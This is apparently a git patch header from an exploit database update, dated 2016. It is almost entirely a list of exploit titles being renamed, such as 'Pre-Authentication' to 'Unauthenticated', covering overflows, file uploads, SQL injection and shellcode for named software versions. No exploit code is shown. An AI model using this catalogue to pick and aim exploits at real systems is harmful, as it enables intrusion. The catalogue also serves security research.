From 0be1ea959a2d078221d43cba80a942cb6a5d4966 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 9 Sep 2016 05:09:09 +0000 Subject: [PATCH] DB: 2016-09-09 11 new exploits Samba 3.0.4 - SWAT Authorization Buffer Overflow Samba 3.0.4 SWAT - Authorisation Buffer Overflow Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit) HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit) WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC) WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC) FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service Multiple Applications - Local Credentials Disclosure Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2) Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2) IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC) Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC) Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC) Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC) Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC) Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC) SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow Joomla Component JPad 1.0 - Post-Authentication SQL Injection Joomla Component JPad 1.0 - Authenticated SQL Injection CMS Made Simple 1.2.4 - (FileManager module) File Upload CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication) freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - (Post-Authentication) File Upload AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC AJ Auction Authentication - Bypass Exploit AJ Auction - Authentication Bypass Simple Directory Listing 2 - Cross-Site File Upload Simple Directory Listing 2 - Cross-Site Arbitrary File Upload Mini File Host 1.x - Arbitrary PHP File Upload Mini File Host 1.x - Arbitrary .PHP File Upload Memberkit 1.0 - Remote PHP File Upload Memberkit 1.0 - Remote Arbitrary .PHP File Upload WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC) Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC) WikkiTikkiTavi 1.11 - Remote PHP File Upload WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation zFeeder 1.6 - 'admin.php' Pre-Authentication zFeeder 1.6 - 'admin.php' Unauthenticated Addonics NAS Adapter - Post-Authentication Denial of Service Addonics NAS Adapter - Authenticated Denial of Service Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service Hannon Hill Cascade Server - (Post-Authentication) Command Execution Hannon Hill Cascade Server - (Authenticated) Command Execution Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC) XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC) Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal Adobe JRun 4 - (logfile) Authenticated Directory Traversal FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service NetAccess IP3 - (Post-Authentication) (ping option) Command Injection NetAccess IP3 - (Authenticated) (ping option) Command Injection Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC) httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC) Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC) Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit) eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2) uTorrent WebUI 0.370 - Authorization header Denial of Service uTorrent WebUI 0.370 - Authorisation Header Denial of Service Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass) ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass) Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass) BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass) dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting) dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting) Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Achievo 1.4.3 - Multiple Authorization Flaws Achievo 1.4.3 - Multiple Authorisation Flaws PHPMotion 1.62 - 'FCKeditor' File Upload PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal Home FTP Server 1.11.1.149 - Authenticated Directory Traversal News Script PHP Pro - 'FCKeditor' File Upload News Script PHP Pro - 'FCKeditor' Arbitrary File Upload Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow MailEnable - Authorization Header Buffer Overflow MailEnable - Authorisation Header Buffer Overflow ColdFusion 8.0.1 - Arbitrary File Upload and Execution Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution ColdFusion 8.0.1 - Arbitrary File Upload / Execution Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution OpenX - banner-edit.php File Upload PHP Code Execution OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution Joomla 1.5.12 - tinybrowser File Upload Code Execution Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit If-CMS 2.07 - Pre-Authentication Local File Inclusion (1) If-CMS 2.07 - Unauthenticated Local File Inclusion (1) IPComp - encapsulation Pre-Authentication kernel memory Corruption IPComp - encapsulation Unauthenticated kernel memory Corruption SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass) Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass) Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2) If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass) DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit TomatoCart 1.1 - Post-Authentication Local File Inclusion TomatoCart 1.1 - Authenticated Local File Inclusion BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass QuiXplorer 2.3 - Bugtraq File Upload QuiXplorer 2.3 - Bugtraq Arbitrary File Upload QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit) Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter) Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter) BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection Dolibarr ERP & CRM 3 - Authenticated OS Command Injection V-CMS - PHP File Upload and Execution V-CMS - Arbitrary .PHP File Upload / Execution WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection WebCalendar 1.2.4 - Unauthenticated Remote Code Injection appRain CMF - Arbitrary PHP File Upload appRain CMF - Arbitrary .PHP File Upload EGallery - PHP File Upload EGallery - Arbitrary .PHP File Upload SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload WebPageTest - Arbitrary PHP File Upload WebPageTest - Arbitrary .PHP File Upload XODA 0.4.5 - Arbitrary PHP File Upload XODA 0.4.5 - Arbitrary .PHP File Upload Elcom CMS 7.4.10 - Community Manager Insecure File Upload Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1) OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2) Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit qdPM 7.0 - Arbitrary PHP File Upload qdPM 7.0 - Arbitrary .PHP File Upload Oracle Database - Authentication Protocol Security Bypass Oracle Database - Protocol Authentication Bypass Mod_NTLM 0.x - Authorization Heap Overflow Mod_NTLM 0.x - Authorisation Heap Overflow Mod_NTLM 0.x - Authorization Format String Mod_NTLM 0.x - Authorisation Format String Geeklog 1.3.x - Authentication SQL Injection Geeklog 1.3.x - Authenticated SQL Injection NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution MySQL - Remote Pre-Authentication User Enumeration MySQL - Remote Unauthenticated User Enumeration vbPortal 2.0 alpha 8.1 - Authentication SQL Injection vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3) WordPress WP-Property Plugin - PHP File Upload WordPress Asset-Manager Plugin - PHP File Upload WordPress WP-Property Plugin - Arbitrary .PHP File Upload WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2) Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun Novell NCP - Pre-Authentication Remote Root Exploit Novell NCP - Unauthenticated Remote Root Exploit Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass Polar Helpdesk 3.0 - Cookie Based Authentication Bypass IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution IRIS Citations Management Tool - (Authenticated) Remote Command Execution Polycom HDX - Telnet Authorization Bypass (Metasploit) Polycom HDX - Telnet Authentication Bypass (Metasploit) OpenEMR - PHP File Upload OpenEMR - Arbitrary .PHP File Upload PolarPearCMS - PHP File Upload PolarPearCMS - Arbitrary .PHP File Upload Apache 2.0.x - mod_ssl Remote Denial of Service Apache/mod_ssl 2.0.x - Remote Denial of Service phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal MoinMoin - twikidraw Action Traversal File Upload MoinMoin - twikidraw Action Traversal Arbitrary File Upload Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow FlexWATCH 3.0 - AIndex.asp Authorization Bypass FlexWATCH 3.0 - AIndex.asp Authentication Bypass HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload WordPress Curvo Themes - Cross-Site Request Forgery File Upload WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass PHPBB2 - Admin_Ug_Auth.php Administrative Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass Castripper 2.50.70 - '.pls' DEP Exploit Castripper 2.50.70 - '.pls' DEP Bypass Exploit Google Urchin 5.7.3 - Report.cgi Authorization Bypass Google Urchin 5.7.3 - Report.cgi Authentication Bypass Adobe Flash - Method Calls Use-After-Free Adobe Flash - Transform.colorTranform Getter Info Leak RSA Authentication Agent for Web 5.3 - URI redirection RSA Authentication Agent for Web 5.3 - URI Redirection Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow Zabbix 2.0 - 3.0.3 - SQL Injection ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload Katello (Red Hat Satellite) - users/update_roles Missing Authorization Katello (Red Hat Satellite) - users/update_roles Missing Authorisation Freepbx 13.0.x < 13.0.154 - Remote Command Execution FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution Jobberbase 2.0 - Multiple Vulnerabilities Windows x86 - Bind Shell TCP Shellcode WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution Moab < 7.2.9 - Authorization Bypass Moab < 7.2.9 - Authentication Bypass Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection Drupal Core < 7.32 - Pre-Authentication SQL Injection Drupal Core < 7.32 - Unauthenticated SQL Injection Tincd - Post-Authentication Remote TCP Stack Buffer Overflow Tincd - Authenticated Remote TCP Stack Buffer Overflow PMB 4.1.3 - Post-Authentication SQL Injection PMB 4.1.3 - Authenticated SQL Injection Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution ManageEngine Multiple Products - Authenticated File Upload ManageEngine Multiple Products - Authenticated Arbitrary File Upload Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass) Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass) Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection Symantec Web Gateway 5 - restore.php Authenticated Command Injection JBoss Seam 2 - Arbitrary File Upload and Execution JBoss Seam 2 - Arbitrary File Upload / Execution Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit) Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass JibberBook 2.3 - 'Login_form.php' Authentication Bypass Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Zenoss 3.2.1 - Remote Post-Authentication Command Execution Zenoss 3.2.1 - Remote Authenticated Command Execution Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution Magento CE < 1.9.0.1 - Authenticated Remote Code Execution Netsweeper 4.0.9 - Arbitrary File Upload and Execution Netsweeper 4.0.9 - Arbitrary File Upload / Execution Netsweeper 4.0.8 - Arbitrary File Upload and Execution Netsweeper 4.0.8 - Arbitrary File Upload / Execution EasyITSP - 'customers_edit.php' Authentication Security Bypass EasyITSP - 'customers_edit.php' Authentication Bypass Wolf CMS - Arbitrary File Upload and Execution Wolf CMS - Arbitrary File Upload / Execution Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command 